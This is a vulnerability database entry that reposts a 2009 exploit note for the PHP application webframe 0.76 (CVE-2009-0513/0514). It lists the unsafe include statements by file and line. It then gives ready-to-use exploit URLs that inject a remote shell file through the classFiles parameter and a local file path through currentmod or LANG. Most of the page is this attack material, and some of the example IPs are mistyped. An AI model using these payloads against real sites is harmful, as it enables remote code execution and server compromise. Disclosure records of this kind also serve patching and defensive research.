https://cxsecurity.com/issue/WLB-2009020162
webframe 0.76 Multiple File Inclusion Vulnerabilities






漏洞ID | 1052198 | 漏洞类型 | |
发布时间 | 2009-02-12 | 更新时间 | 2009-02-12 |
![]() |
CVE-2009-0513
CVE-2009-0514 |
![]() |
N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-----------------[-Rfi/Lfi-]-----------------
script:webframe 0.76
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/phpwebframe/webframe-0.76-src.tar.gz?modtime=1155546760&big_mirror=0
------------------------------------------------------------------
........................................................
vul1: /mod/admin/doc/index.php line 3;
include_once "$classFiles/xml.php";
==============================================
vul2:/mod/index.php line 5,7,9,11,13;
include_once "$classFiles/table.php";
//html class
include_once "$classFiles/html.php";
//Database class
include_once "$classFiles/mysql.php";
//Form class
include_once "$classFiles/form.php";
//Language file
include "../$currentmod/lang/$LANG.php"; ----> = lfi
============================================================
vul3: /mod/base/menu.php line 17;
include_once "$classFiles/mysql.php
============================================================
-----------------------------------------------------
xpl rfi:
http://127.0..0.1/path/mod/admin/doc/index.php?classFiles=[shell.txt?]
http://127.0.0.1/path/mod/index.php?classFiles=[shell.txt?]
http://127.0.0..1/path/mod/base/menu.php?classFiles=[shell.txt?]
xpl lfi:
http://127.0.0.1/path/mod/index.php?currentmod=[Lfi]
http://127.0.0.1/path/mod/index.php?LANG=[Lfi]
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from[iran]
---------------------------------------------------
检索漏洞
开始时间
结束时间